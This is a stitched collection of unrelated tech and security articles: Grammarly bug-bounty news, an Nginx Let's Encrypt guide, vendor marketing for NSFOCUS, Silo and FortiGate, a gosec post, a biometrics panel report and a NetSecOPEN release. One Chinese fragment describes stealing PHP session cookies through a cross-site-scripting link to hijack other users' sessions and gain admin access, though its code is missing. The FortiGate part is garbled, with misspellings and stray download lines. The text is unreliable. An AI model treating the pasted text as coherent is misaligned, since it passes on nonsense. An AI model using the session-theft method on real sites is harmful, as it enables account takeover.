The private bug bounty program has nearly 1,500 participants and is ready for a public rollout with HackerOne.

Grammarly, which provides writing assistance through its online editor, is taking its bug bounty program public with HackerOne, the two companies confirmed today.

Grammarly uses artificial intelligence to detect grammar, spelling, punctuation, word choice, and style mistakes. Users can copy and paste English text into the editor, or install its free Chrome, Safari, Firefox, or Edge extensions for writing on the web.

As part of its efforts to secure 15 million users' data, Grammarly has been running a private bug bounty program on HackerOne for over a year. The invite-only program has nearly 1,500 participants, it says, and the company is ready to build on its success with a public launch.

"Our approach was to continually expand the number of researchers who are working on our interfaces, allowing us to respond quickly and broaden our focus," says Joe Xavier, vice president of engineering at Grammarly, in an interview with HackerOne.

Xavier says the bug bounty program is one part of Grammarly's overall security strategy, which also includes regular penetration tests, recruiting security experts, and increasing awareness.

Read more details here .

Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.View Full Bio

Web应用程序(aka网站)是基于客户端 - 服务器模型的应用程序。服务器提供数据库访问和业务逻辑。它托管在Web服务器上。客户端应用程序在客户端Web浏览器上运行。Web应用程序通常用Java，C#和VB.Net，php，ColdFusion标记语言等语言编写.Web应用程序中使用的数据库引擎包括mysql，MS SQL Server，PostgreSQL，SQLite等。

大多数Web应用程序都托管在可通过Internet访问的公共服务器上。这使得它们易于访问，因此容易受到攻击。以下是常见的Web应用程序威胁。

组织可以采用以下策略来保护自己免受Web服务器攻击。

我们将劫持位于www.techpanda.org的Web应用程序的用户会话。我们将使用跨站点脚本来读取cookie会话ID，然后使用它来模拟合法的用户会话。

假设是攻击者可以访问Web应用程序，并且他想劫持使用相同应用程序的其他用户的会话。假设攻击者的访问帐户是有限的，攻击的目标可能是获取对Web应用程序的管理员访问权限。

入门

这里，上面的代码使用javascript。它添加了一个带onclick事件的超链接。当毫无戒心的用户单击该链接时，该事件将检索PHP cookie会话ID并将其与URL中的会话ID一起发送到snatch_sess_id.php页面

输入其余详细信息，如下所示

注意：您获得的值可能与本教程中的值不同，但概念是相同的

下面的流程图显示了完成此练习必须采取的步骤。

您将需要此部分的Firefox Web浏览器和Tamper Data插件

Securing your websites with an SSL certificate is now a must for all website admins, else the web browsers will mark the website as unsafe to visit, causing the loss of website traffic. But SSL certificate is not cheap, but there is a way around to get an SSL certificate for free with only downside that we need to renew SSL cert every 90 days but that process can also be automated.

In this tutorial, we will discuss how we can configure a SSL certificate on Nginx with Let’s encrypt. We have already discussed in our previous tutorial about how we can configure SSL cert with Let’s certificate on Apache Web Server, so if you are using Apache you can check that tutorial. Now let’s start with the process to configure SSL on Nginx with Let’s Encrypt.

Recommended Read : Simple way to configure Nginx Reverse Proxy

Here we will discuss the method for Ubuntu & CentOS/RHEL using a let’s encrypt tool called certbot. So let’s start with Pre-requisites,

Also Read : Analyzing APACHE logs in CLI (& GUI) using GoAccess

We will need a registered Domain address,

We will need a CentOS/RHEL or Ubuntu server with Ngnix installed. Installation steps are mentioned below,

Nginx is available with default Ubuntu Repositories. So simple install it using the following command,

$ sudo apt-get update && sudo apt-get install nginx

We need to add some repos for installing nginx on CentOS & we have created a detailed ARTICLE HERE for nginx installation on CentOS/RHEL.

Now start the services & enable it for boot,

# systemctl start nginx

# systemctl enable nginx

Once its installed, we can move to next part i.e. installing let’s encrypt & issuing of SSL certificate for website.

Firstly we need to install Certbot on Ubuntu system, but its not available with default Ubuntu repositories. Install the Ubuntu repos with the following command,

$ sudo apt-get install software-properties-common

$ sudo add-apt-repository universe

$ sudo add-apt-repository ppa:certbot/certbot

$ sudo apt-get update

Now to install the Certbot , execute the following command from terminal,

$ sudo apt-get install python-certbot-nginx

Now, we will issue a new SSL certificate using certbot command. Use the following command as reference ,

$ sudo certbot nginx -dlinuxtechlab.com -dwww.linuxtechlab.com

Here linuxtechlab.com is the name of the website for which the certificate will be issues, replace this with the name of your website. If this is the first time you are using Certbot, you will be asked to enter an Email address & also to agree to User Agreement,

Now certbot will then check with let’s encrypt server to verify that you are the web admin of the domain that you are trying to get an SSL for (usually you need to place two files with random text provided by let’s encrypt at location http://domain-name/.well-known/acme-challenge).

Once site ownership has been confirmed, we will be asked to configure redirect settings for Nginx, you can choose 1 (No-Redirect) or 2 (Redirect). If you choose 1, than you will have to configure redirect yourselves in Nginx configuration afterwards, with option 2 , the configuration will be updated & Nginx will be reloaded to implement the new changes made.

Our cert is now installed & new configurations also have been loaded. As mentioned above, we need to renew the cert every 90 days, for that we can create a new cronjob, mentioned at the end of this tutorial.

Now let’s discuss the SSL issue procedure for CentOS & RHEL,

To install Certbot on CentOS, we will need to first install EPEL repositories first on our system. Install EPEL using following command on your system,

# rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-11.noarch.rpm

# rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

# rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm

Now we to install certbot use the following command,

# yum install certbot-nginx

Once the certbot has been installed, we can then issue the SSL certificate with the same command as mentioned above,

# certbot nginx -d linuxtechlab.com -d www.linuxtechlab.com

Now the process will same as has been mentioned above for Ubuntu. Now after the cert has been installed, we need to make sure that the certificate is renewed before 90 days.

Following cron job will take care of the automatic certificate renewal,

# crontab -e

this job will renew certificate every night at 1:05 AM. We can also run the following command to dry-run or test the renewal of certificate,

# certbot renew dry-run

This completes our tutorial on how to configure SSL on Nginx with Let’s encrypt. Please feel free to send any questions or queries you have regarding this tutorial.

千里之堤，溃于蚁穴。安全之堤，溃于漏洞。在网络中，形形色色的漏洞乃风险之源。

参考CVE历年安全信息共享中披露的漏洞统计数据，可以直观的发现，中高风险等级漏洞的数量逐年增加，而相应的对于安全厂商的漏洞管理模块的处理能力的需求也随之提高。纵观数据，2017、2018是漏洞爆发之年。与2016年相比，2017年的漏洞总数翻了一番不止，同比增加约120％。在2017年，日均报告漏洞数量为40个，而在2016年日均报告的漏洞数量仅为17个。

图1 CVE1999-2018年漏洞统计结果

根据Risk Based Security公司近期的一份报告，39.5%的漏洞有足够公开的细节被利用实施攻击。近年，漏洞被攻击利用的平均时间大大缩短（从45天缩短到15天）。漏洞的披露和漏洞的利用方式也逐步发生了改变，借助于各大社区和社交平台，漏洞的传播速度惊人，早上披露的漏洞，下午可能已经有了利用代码，到了晚上很多攻击可能已经发生。这也就意味着，一个已知的漏洞，其在系统中的风险等级不再是静态的，而是会随着漏洞的传播及越来越多的公开细节而发生变化。传统的漏洞分级方式，或可导致真正需要紧急修补的漏洞被淹没在大量漏洞报告内容中，运维人员仅凭自身经验处置漏洞，缺乏处置漏洞所需的实时动态情报依据。

图2Risk Based Security公司对漏洞被利用的分类统计

鉴于这些变化，Gartner总结业内新的思路，并提出威胁和漏洞管理（TVM）的概念，这将成为漏洞管理市场新的发展趋势。绿盟科技未雨绸缪，创新地推出绿盟威胁和漏洞管理平台（NSFOCUS TVM）。绿盟TVM借助威胁情报的漏洞实时动态数据，较传统的漏洞管理系统具有不可比拟的优势。

漏洞管理目的是保护资产和资产上存储、传输的数据，对资产本身的管理是漏洞管理的前提，资产的变化会带来新的风险点。利用外部威胁情报，根据漏洞热度、POC信息等实时信息快速定位影响本地资产安全的关键风险点，结合业务系统资产重要等级，给出更为有效的风险评估分析。

绿盟科技的安全专家关注全球安全漏洞情报、与多方广泛合作，建立起了绿盟科技威胁情报系统，并成为绿盟TVM方案的重要情报来源。绿盟TVM方案从绿盟威胁情报系统获取漏洞披露情报，结合资产信息，精确分析漏洞对网络的影响，并对可能存在漏洞的资产进行预警。

图3 绿盟TVM方案关键风险点发掘方法

如图3所示，绿盟科技在漏洞管理方面，积极防患于未然，通过结合威胁情报和资产的大数据分析发现最易受到攻击的关键风险点。优先修补关键漏洞，可以在数以千计的漏洞管理中降低管控难度，进而最大化降低资产受到漏洞攻击的概率。

图4绿盟TVM方案漏洞修补优先级模型

针对2017年Wanncry勒索病毒利用的MS17-010漏洞和Petys勒索病毒利用的CVE-2017-0199漏洞等突发的、大规模的漏洞攻击爆发的案例，领先的安全厂商已建立了系统的安全情报体系应对这一变化，并且把厂商和客户通道打通，助力客户建立健全安全漏洞的应急响应机制，第一时间发现漏洞、跟踪漏洞的利用过程，实时调整漏洞的响应级别。

图5绿盟科技应急响应机制图解

作为国内领先的网络安全公司，绿盟科技早已建立了动态的应急响应机制。绿盟威胁情报中心实时跟踪热点漏洞事件，绿盟TVM获取情报后直接定位到客户网络受影响资产范围，给出漏洞预警，帮助安全运维人员尽快完成确认、分析、修复工作，并确认修复效果。最后，结合绿盟科技官方信息传播渠道，形成完善的基于情报的漏洞响应机制。

在绿盟TVM方案中，威胁情报被应用于漏洞快速响应、漏洞风险分析和优先级分析、漏洞修补等各环节，帮助运维人员动态识别企业IT系统中的关键风险，优先处理优关键漏洞，在数以千计的漏洞管理中降低管控治理难度，从而达到对安全风险未雨绸缪。该方案技术特点和方案价值已得到客户广泛认可，在运营商、金融等行业得到成功应用。

当漏洞管理遇上威胁情报，企业只要少量投入便可让漏洞治理变得简单高效，安全绸缪，运维无忧。

Reading Time: 3 minutes

Golang keeps trending up and to the right in programming language popularity, for many reasons. Great libraries, which means more users, which means more libraries and more users ― more users like me who are prone to make mistakes.

Who can say at one time or another they haven’t accidentally checked in some hard coded password, or personal access token, or used an insecure random number seed. I know I have! Well I can tell you that whilst Alexander Pope says “to forgive divine,” sys admins and code reviewers do not think so kindly.

Not to worry, there is an open source tool called gosec which exists to help spot problems right in your Go source code. You can run this from your desktop/editor, or you can (and possibly) should put it as part of your pipeline (should the “unforgivable” happen).

Gosec works by loading up all your sourcecode into an AST, and applies a set of built in rules looking for common mistakes such as secrets in code (kind of neat: it looks for hi-entropy strings which usually mean a secret), SQL string assembly (a source of injection attacks) and more. If it gets a false positive, you can always add a comment telling it to skip it (maybe that string correcthorsebatterystaple89874328^&^&*^FDHJKHKJFDHJKS is actually a legitimate thing and not at all a secret).

Once gosec is in your pipeline, should any rules be broken, your build will fail before too much harm is done. It looks like this:

(There are many formats you can report violations in this is just the default, which seems fine to me).

Using this in CloudBees CodeShip is super easy, of course. CloudBees CodeShip has some pretty good Golang support “out of the box”, so firstly create a new project:

This will install the latest version of it (not a bad idea) and then apply the full set of rules. You can exclude specific rules on the command line (or you can annotate code in comments to ignore things that are false positives as needed).

Gosec works off source code and the AST, so it makes sense to do this before running tests to get that earlier feedback (you could possibly do it even before the build steps although they may modify the source or bring in more, up to you really).

And that is it. Your day could be slightly less embarrassing.

Being competitive in the 21 st century requires a business to stay on the cutting edge of technology. For years, companies all over the world have used customer data to make important decisions about the direction they should take.

The main thing you need to be concerned with when collecting and storing data is keeping it out of the hands of cyber-criminals. A recent poll shows that 60 percent of business owners realize that cyber-attacks are getting more sophisticated and complex with each passing year.

Combating these attacks will require you to implement the use of tools like database activity monitoring and auditing software.

The following are some of the most common data security mistakes you need to work hard to avoid.

While being on the cutting edge of technology is important, you need to avoid letting this desire to stay “in the know” get in the way of sound data security practices. The most effective security tools on the market today such as encryption or key management have not changed much over the years. Anytime you are presented with a sales pitch about how a program will be the “silver bullet” to end your security woes, be wary.

Often times, these claims will be based on fiction. Instead of trying to reinvent the wheel when it comes to data security, you need to think about sticking with what works.

In order for your security infrastructure to work properly, all of the information that you collect will need to be able to communicate with the various parts of your system. The biggest mistake most businesses make when it comes to storing is having a standalone container for each IT component they have. While this may seem like a great way to avoid breaches, it can actually create more problems for your infrastructure in the long run.

Creating a top-down network security system that takes into account all of your data is a much better option. Not only will this keep your system more secure, but it will also allow you to see the big picture when it comes to the data you have collected.

Saving money is something most business owners are extremely passionate about. In some instances, the desire you have to save money may actually get in the way of sound data security practices. Some business owners try to do the bare minimum when it comes to data security, which usually leads to breaches.

Instead of trying to skimp on the quality and scope of your data security to save money, you need to be more concerned with putting a system in place that works. If you are unsure about what type of data security tools you need, you can consult with an IT security professional to get a bit of guidance.

Another mistake that most businesses make when it comes to data security is thinking they can set and forget the software they use. In reality, the security measures you have put in place to protect your data will need to be tested on a regular basis. This is the only way you can know if these measures are effective. If vulnerabilities are found during these tests, you need to work on getting them fixed immediately.

Establishing effective data security is an ongoing process. Getting professional help with this process can help you avoid making mistakes with your data.

Regulated investment firms use the web to gather market intelligence, to access data aggregation tools and business apps, and to communicate via webmail and social media.

While many (if not most) business functions have shifted to the web and cloud apps, including IT security, the primary tool used by research analysts and investment managers remains stuck in IT’s past : the locally installed browser. A holdover from the 1990s, the local browser’s inherent weaknesses make it notoriously difficult to manage, monitor, and secure against web-borne exploits.

This has created a growing compliance blindspot for buy-side and sell-side firms . At the same time, the pressure from federal and state regulators is steadily increasing. Registered investment advisers are one example. By subjecting 17% of firms to OCIE examinations in FY 2018, the SEC already exceeded its own ambitious goal (15%) in this group alone for this year.

Chief Compliance Officers, CISOs and CTOs in the industry have been put on notice. One simple page view request on an infected website can result in malware or spyware spreading through the firm’s network, resulting in data breaches and financial and reputational damages. One post on a social media platform or in a chat room may invite the scrutiny of regulators.

How can firms ensure oversight and governance when team members go online? In this post, we highlight surveys, reports and whitepapers that provide useful facts and actionable insights to help practitioners answer this question:

*

The Securities and Exchange Commission’s Enforcement Division has published the FY 2018 Annual Report of its ongoing efforts to protect investors and market integrity.

The report presents the activities of the division from both a qualitative and quantitative perspective. In FY 2018, the SEC continued to bring enforcement actions relating to a wide variety of market manipulations, misconduct and compliance violations. It obtained judgments and orders totaling more than $3.945 billion in disgorgement and penalties.

The report also documents the Division’s increasing focus on misconduct in the digital realm. In FY 2018, the SEC brought 20 standalone cases, including such involving ICOs and digital assets. At the end of the fiscal year, more than 225 cyber-related investigations were underway. 2018 saw the SEC’s first enforcement action charging violations of Regulation S-ID, known as the Identity Theft Red Flags Rule, which is designed to protect customers from the risk of identity theft.

While an agency-wide hiring freeze since late 2016 led to a 10% staff reduction since, this seems not to have resulted in less pressure on regulated securities investment firms. The Division’s annual report documents significant continued enforcement-related activities.

When regulators request such information from entities under investigation, disparate data sources and a lack of compliance-ready IT tools may prevent firms to “promptly produce” (SEC lingo) the data and documents. The use of local browsers, in particular, can become an audit impediment, because it prevents a unified view into a firm’s activities on the web, for example when team members post on social media or pull research data from third-party aggregators.

A compliance-ready browser built in the cloud, provided as a service offsite and centrally managed by IT, removes such hurdles. With Silo, the cloud browser, all user actions are logged and encrypted, to facilitate at-a-glance compliance reviews and post-issue remediation.

*

In November, international law firm Proskauer Rose LLP released its 2018 Proskauer Annual Review and 2019 Outlook for Hedge Funds, Private Equity Funds and Other Private Funds .

The yearly report provides a summary of significant regulatory changes and developments that occurred in the past year in the private equity and hedge funds space. It also includes an overview of SEC examination priorities and enforcement developments impacting the private funds industry.

The SEC brought 821 enforcement actions in 2018, “the second highest total ever,” the authors point out. This included more than 100 enforcement actions involving advisers and investment companies, a 32% increase from 2017 and the second largest category of actions brought by the SEC in 2018.

Noteworthy in particular from the compliance and IT perspective is the extensive review in this report of a $1 million settlement with the SEC by broker-dealer and adviser Voya Financial Advisors (VFA). Following a data breach that compromised the personal information of 5,600 customers, the SEC had alleged failures in the firm’s cybersecurity policies and procedures.

Increased reliance on third-party vendors and external service providers and the adoption of web-based apps and services mean more complexity and less oversight for compliance and IT admins when employees and external contractors access the web on behalf of the firm.

Proskauer Rose LLP: 2018 Proskauer Annual Review and 2019 Outlook for Hedge Funds, Private Equity Funds and Other Private Funds (11/2018)

*

Global consulting firm Accenture has examined historical inefficiencies in the business model of the capital markets industry as it faces digital disruption. One of the results is the firm’s recent report Capital Markets Technology 2022 , in which the authors highlight five technology design principles for investment banks and advisory firms.

Likely to resonate with compliance and IT leaders are Accenture’s design principles # 4 and # 5, which prescribe deploying technologies that are agile and resilient as well as simple and homogeneous.

The financial services sector’s shift to web apps, SaaS and cloud utilities is putting compliance officers and IT in a tough spot. They are tasked with preserving access while maintaining oversight and containing risk. According to Accenture’s Capital Markets Technology 2022 outlook, 9 out of 10 financial services compliance officers expect that compliance costs will further increase.

One contributing factor is the continued use of the locally installed browser as the primary tool to access and manage cloud-based apps and web services. Because the regular browser wasn’t designed with security and compliance in mind, it is notoriously difficult to control and monitor. Its architectural resistance to risk management is creating dangerous blind spots for the compliance team and IT. Deploying a cloud browser instead removes the local attack surface for web-borne exploits, reduces overall complexity, and provides unified, at-a-glance monitoring, logging and auditing capabilities for compliance leaders.

*

22% of surveyed private equity (PE) firms have recently experienced a cybersecurity breach, according to the annual 2018 Global Private Equity Survey conducted by consulting firm EY . More than half (58%) of respondents said their reported incidents were considered serious. Many more may have gone unreported.

Infographic Source: EY

Most private equity firms (70%) covered rely on externally-developed threat intelligence tools. The survey’s findings also indicate that discomfort and insecurity remain about specific threats and compliance relevant risks that such tools may not detect or prevent.

This could explain why “Employee Training” (87%) was the most common response to the survey question “What steps are you taking to improve your firm’s cybersecurity?”

Security researchers agree that most data breaches are web-related. A secure cloud-based browser removes this attack surface from the local IT. All web code is rendered in a centrally managed isolated environment offsite, and only an interactive display of the web page reaches the endpoint over an alternate, non-HTTP protocol. No matter if employees click deceptive links or download infected files any web-borne exploits are prevented from ever reaching the firm’s computers.

*

For investment adviser firms (IAs) in the process of devising their Information Security Program (ISP), consultancy Ascendant Compliance Management provides in-depth guidance. Based on a review of OCIE examination priorities, its manual Getting Your Information Security Program Up To Scratch recommends taking a step-by-step approach.

Source: Ascendant

The paper, written by Ascendant’s Tom Hackett, includes a comprehensive overview of OCIE priorities and the policies and procedures required to protects the firm’s digital assets and meet the expectations of its examiners. It focuses on Governance and Risk Assessment, Access Rights and Controls, Data Loss Prevention, Vendor Management, Training, and Incident Response.

Compliance managers and IT admins will appreciate the hands-on approach of this guide, which translates regulatory priorities into actionable items for practitioners.

Ascendant: Getting Your Information Security Program Up To Scratch (2018)

*

Discover why leading investment firms and advisers are using Silo, the cloud browser. Find out how Silo helps minimize risk, maximize productivity and ensure oversight and governance when employees go online. Try Silo yourself:

The FortiGate/FortiWiFi 80C series are compact, cost effective, all-in-one security appliances that deliver Fortinet’s Connected UTM. Ideal for small business. View full Fortinet FortiGate 80C specs on CNET. Fortinet FortiGate 80C security appliance Series Specs. Overview Prices. Proven Security for Remote Offices, Retail, and Customer Premise Equipment. The FortiGateC/80CM multi-threat security platforms deliver comprehensive.

A client reputation feature gives enterprises a cumulative security ranking of each device based on a range of behaviors and provides specific, actionable information that enables organizations to identity compromised systems and potential zero-day attacks in real time.

If you currently own a FortiGate 80C, services and support can be 80d below. It is imperative for you to control the vast amount of confidential, regulated, and proprietary data traversing your network, and keep it within defined network boundaries.

Subscriptions include antivirus, intrusion prevention, web filtering, antispam, vulnerability and compliance management, application control, and database security services. This results in improved performance of applications and network services, as well as helping to avoid additional higher-bandwidth provisioning requirements. High Availability HA configuration enhances reliability and increases performance by clustering multiple FortiGate appliances into a single entity.

FortiASIC is a family of purpose built, high-performance network and content processors that uses an intelligent proprietary content scanning engine and multiple algorithms to accelerate computeintensive security services. Application classification and control is essential to manage the explosion of new web-based applications bombarding networks today, as most application traffic looks like normal web traffic to traditional firewalls.

More Intelligence Build Smart Policies More Intelligence with automatic adjustment of role-based policies for users and guests based on location, data and application profile.

Most Related TSRGD 2002 EBOOK DOWNLOAD

Each VDOM contains its own virtual interfaces, security profiles, routing table, administration and many other features. FortiCare support enables your Fortinet products to perform optimally.

You can use the wide range of configurable actions to log, block, and archive data, as well as ban or quarantine users.

By coupling application intelligence with firewall technology, the FortiGate platform is able to deliver realtime security with integrated application content level inspection, thereby simplifying security deployments. Intrusion Prevention IPS technology provides protection against current and emerging network level threats.

Fortiyate also ease migration to new industry standards such as IPv6, supporting dynamic routing or both IPv4 and IPv6 networks. Fortinet’s application control technology identifies application traffic and then applies security policies easily defined by the administrator.

This behavior is then analyzed by our threat research team to identify threats as they emerge and generate new signatures that will be incorporated into our FortiGuard services.

You now have the ability to enforce appropriate use policies on inappropriate encrypted web content, and protect servers from. Reports can provide historical and current analysis of network activity to aid with identification of security issues and to prevent network misuse and abuse. Fortinet firewall technology delivers industry-leading performance for network and application firewalling including Web 2.

It provides more security, intelligence and control to help enterprises be better protected against fortigat advanced threats and enable more secure BYOD environments. It defends your environment from complex, sophisticated attacks without degrading network availability fprtigate affecting application performance.

The fprtigate result is more flexible and granular policy control, with deeper visibility into your network traffic. FortiGate consolidated security appliances provide extensive logging capabilities for traffic, system, and network protection functions.

Most Related MENDELOW MATRIX PDF DOWNLOAD

Application control enables you to define and enforce policies for thousands of applications running on your endpoints, regardless of the port or the protocol used for communication.

The Fortinet Global Security Research Team creates these updates to ensure up-to-date protection against sophisticated threats.

Enhanced reporting and analysis also provides administrators with more intelligence on the behavior of their network, users, devices, applications and threats. Wireless Controller Wireless controller integrated into every FortiGate platform centralizes the management fprtigate monitoring of all FortiAP units. It verifies the installation of the most recent version of the FortiClient application, up-to-date antivirus signatures, and rortigate firewall before allowing the traffic from that endpoint to pass through the FortiGate platform.

SSL-Encrypted Traffic Inspection protects clients and web and application servers from malicious SSL-encrypted traffic, to which most security devices are often blind. The FortiGate product family provides cost-effective, comprehensive protection against network, content, dortigate application-level threats.

WAN optimization lowers your networking costs and improves your application and network performance by reducing the amount of data transmitted over your Fortigat. Antivirus content inspection technology provides protection against virus, spyware, worms, phishing and other forms of malware being transmitted over the network infrastructure.

Click here to jump to more pricing! The technology restricts access to denied categories based on the policy by comparing each Web address request to a Fortinet hosted database.

SolidRun’s “ClearFog CX 8K” SBC is built around a “CEx7 A8040” COM Express Type 7 module that runs linux on a quad -A72 Armada A8040. Features include 4x 10GbE SFP+ ports and mini-PCIe, M.2, and SATA expansion.

In August, SolidRun updated its ClearFog line of Linux-driven router boards with a high-endClearFog GT 8K SBC with the same 2GHz, quad-core, Cortex-A72 Marvell Armada A8040 SoC found on its MacchiatoBIN Double Shot Mini-ITX board. Now, the company has returned to the headless (no graphics) Armada A8040 with the ClearFog CX 8K.

ClearFog CX 8K (left) and CEx7 A8040 COM

(click images to enlarge)

Unlike the monolithic ClearFog GT 8K and MacchiatoBIN SBCs, the board has a sandwich-style design similar to the earlier, dual Cortex-A9 Armada 38x drivenClearFog Pro andClearFog Base boards. The ClearFog CX 8K SBC incorporates SolidRun’s new CEx7 A8040 COM via a COM Express Basic Type 7 interface.

We saw no announcement for the ClearFog CX 8K, but the product page was noticed by CNXSoft . The board starts at $360 with 8GB eMMC and an empty RAM socket. Adding 4GB DDR4 bumps you up to $435, and boosting RAM to 16GB will cost you $690. All the prices include the CEx7 A8040 module and a heatsink.

CEx7 A8040 module

The CEx7 A8040 module uses the Basic Type 7 form factor, which is typically found on “server-on-module” offerings featuring high-end Intel Xeon D 15xx or Atom C3xxx processors. It’s rare to see an Arm-based Type 7 module. The only one we can recall is Reflex CES’ COMXpressSX Stratix 10 . According to SolidRun, moving to Type 7 will enable “simpler development and deployment options, and simple interchangeability” with future modules.

Like the ClearFog CX 8K, the 125 x 95mm CEx7 A8040 supports Debian and Yocto Project stacks based on Linux Kernel 4.4x. The module supplies 8GB eMMC and supports up to 16GB DDR4.

The CEx7 A8040 features dual 10GbE interfaces, 2x SATA III, PCIe Gen 3 x4, and 2x mini-PCIe lanes. The COM enables Marvell’s 88f8040 secured boot “and high performance security hardware acceleration engines, enabling enhanced security features such as IPsec,” says SolidRun. Virtualization support is also available. Like the ClearFog CX8K board, the module supports 0 to 70°C operation.

ClearFog CX 8K

At 190 x 127mm, the ClearFog CX 8K is a bit larger than the ClearFog GT 8K, and it lacks the earlier model’s -40 to 85°C option. The centerpiece is the bank of 4x 10GbE SFP+ cages with an adjacent, copper GbE port. (There’s one mention of 2x 10GbE instead of the 4x shown in the photo and listed elsewhere, but that may refer to the dual 10GbE controllers that enable the 4x ports.) By comparison the earlier GT 8K has a single 10GbE SFP+, a WAN port, and 4x switched GbE ports with 2.5GbE uplinks to the SoC.

ClearFog CX 8K detail views, front and back

(click images to enlarge)

Like the earlier model, the CX 8K gives you a microSD slot, USB 3.0 port, debug interface, and GPIO. Unlike that model, you also get a SATA III interface. Dual mini-PCIe slots and a single SIM slot are on board along with a PCIe Gen 3 x4 slot.

Specifications listed for the ClearFog CX 8K include:

Further information

The ClearFog CX 8K is available with the CEx7 A8040 module starting at $360 (see pricing above). The CEx7 A8040 module is also available separately for $168 with 8GB eMMC but no RAM and $374 if you add 16GB DDR4. More information may be found on SolidRun’s ClearFog CX 8K and CEx7 A8040 product pages, each of which link to shopping pages.

NYC With more transactions occurring online and subsequently, the number of data breaches increasing biometrics are moving to the forefront in discussions as a top way to authenticate data securely.

However, challenges remain. The method is not yet being widely utilized by consumers or enterprises and for those who are using identification via fingerprint, voice, eye scan or facial recognition, security risks still exist.

Maja Pantic, computing and research director at the Samsung AI Research Center, said at the WSJ Cyber Security Forum in NYC on Tuesday that same emerging models that are making biometrics possible are also being utilized to potentially disrupt the security model behind them.

“These models are powerful tools we can use to generate new data… but also fake data,” she said.

Ellen Richey, vice chairman and head of risk and public policy at Visa, said that the company, which processes half a billion transactions a day, has seen a marked shift in how consumers buy products.

In today’s digitized world, customers have moved to purchasing goods online meaning that their data are open to widescale breaches. Security experts and credit-card companies have looked to biometrics as a potential solution to this issue.

“Transactions have moved online, where ‘something you have’ doesn’t work now it’s ‘something you know,’ also known as passwords,” Richey said. “Then what happened was the mass proliferation of data breaches. We have to solve for online authentication with something different than ‘what you have’ and ‘what you know,’ that is ‘what you are’ or biometrics.”

Making matters easier, previously companies needed a lot of data to recognize people but the advent of using machine learning has helped boost facial recognition and other biometrics applications.

Despite its promise, issues still exist when it comes to biometrics, panelists noted.

One type of technique, dubbed “Deepfake,” is an artificial intelligence-based human image synthesis technique. Typically used to create fake pornographic videos or fake news, Deepfake poses a risk to biometrics as it can also potentially be used to create fake profiles, said Pantic .

“People can use this for new voice profiles to trick the system for ID,” said Pantic. “One issue is that when people use the data for generating new data, they base it on this data they already have. That means you can produce profiles very close to existing profiles and can create profiles.”

At Black Hat 2018, researchers released a slew of PoCs showing how voice authentication can be bypassed. One of these consisted of identifying a target and harvesting about 10 minutes of high-quality audio samples of the victim via public sources such as YouTube, in order to create a fake voice profile.

Making matters worse, Pantic said that the industry is still very far away from technology and knowledge needed to defeat Deepfake techniques.

How can companies implement biometrics while still protecting themselves? The answer is to remember that “there is no silver bullet,” said Richey.

For instance, Visa uses various forms of biometrics that take into account behavior such as the way a user holds the mouse or phone; and the platform inspects the data around the transactions themselves. That means looking at whether customers have purchased products at a website before, or where they live (based on opt-in data collection methods).

“In our security strategy we never rely on just one thing,” she said. “You can use biometrics, but also use other methods like behavioral characteristics.”

SAN JOSE, Calif. Dec. 11, 2018 NetSecOPEN , the first industry organization focused on the creation of open, transparent network security performance testing standards, today announced that 11 prominent security vendors, test solutions and services vendors, and testing laboratories have joined the organization as founding members.

Related podcast: The importance of sharing alliances

The organization also announced the appointment of its first board of directors, who will guide NetSecOPEN toward its goal: making open network security testing standards a reality.

These developments signal decisive momentum for the organization, which formed in 2017 to close the gap between proprietary performance metrics and the observed real-world performance of security solutions. Certification of security product performance today is typically conducted by independent testing laboratories using proprietary testing methodologies.

The NetSecOPEN standard is designed to provide metrics that can be used to compare solutions fairly and to understand the impact on network performance of different solutions under the same conditions. The goal is to examine the performance ramifications of a solution with all of that solution’s security features enabled, conveying the true costs of the solution.

“There is great urgency for open, transparent standards for the testing of network security equipment,” said Brian Monkman, executive director of NetSecOPEN. “Today, security professionals face significant challenges when evaluating, deploying, and optimizing new solutions. Similar product specifications may deliver different results, and products often behave differently with real-world traffic than they do in lab environments.NetSecOPEN was formed specifically to address these issues and make it easier for all organizations to identify the right solutions for securing their environments. We are proud to see measurable progress already, bringing us closer to making open network security testing standards a reality.”

Monkman

NetSecOPEN members collaborate through working groups to create testing standards and guidance. The goal is to achieve consistent, open, repeatable evaluations and results. The Founding Members represent leading vendors of security products and services, prominent providers of testing solutions and services, and well-respected safety science and testing labs. The 11 Founding Member organizations are: Check Point Software Technologies, Cisco, Fortinet, Palo Alto Networks, SonicWall, Sophos, and WatchGuard; test solution and services vendors Spirent and Ixia/Keysight; and testing labs European Advanced Networking Test Center (EANTC) and the University of New Hampshire InterOperability Lab (UNH-IOL).

Executives from the NetSecOPEN Founding Member organizations have offered comments and supporting statements. Please see these endorsements on the NetSecOPEN web site.

The NetSecOPEN board is composed of established professionals with backgrounds in network security solutions and test procedures and methodologies. The Board represents a diverse range of companies with expertise in applying solutions, creating specifications, and driving open, common standards. Members of the NetSecOPEN board are:

Chairman: Jurrie Van Den Breekel, VP, Business Development and Product Management, Spirent Communications

Vice Chairman: Aria Eslambolchizadeh, Executive Director Quality Engineering, SonicWALL

Treasurer: Carsten Rossenhoevel, Managing Director at EANTC (European Advanced Networking Test Center)

Sashi Jeyaretnam, Director, Product Management, Ixia/Keysight

Alex Samonte, Sr. System Consulting Engineer, Fortinet

Brian Monkman, Executive Director, NetSecOPEN

There are currently no up-to-date open standards for network security performance testing. Networks have transitioned in the last decade from 80% unencrypted HTTP traffic to over 80% of the perimeter traffic in many organizations being encrypted with modern secure cipher suites. This change has resulted in the creation of numerous proprietary methods to determine how well security solutions perform. NetSecOPEN addresses this confusing array of competing standards with open standards that are intended to close the gap between how proprietary metrics evaluate performance and how the solutions actually perform in the real world.

The NetSecOPEN testing standard has been submitted to the IETF’s Benchmark Working Group and is available here. It includes a real-world traffic mix with 400 encryption certificates and 10,000 unique URLs. The testing methodology is unique to NetSecOPEN and provides a more comprehensive and accurate picture of the load performance that security products face. Specifications are in the final stages of approval. Products can be submitted for testing beginning in Q4 2018. For further information and assistance, please contact info@netsecopen.org.

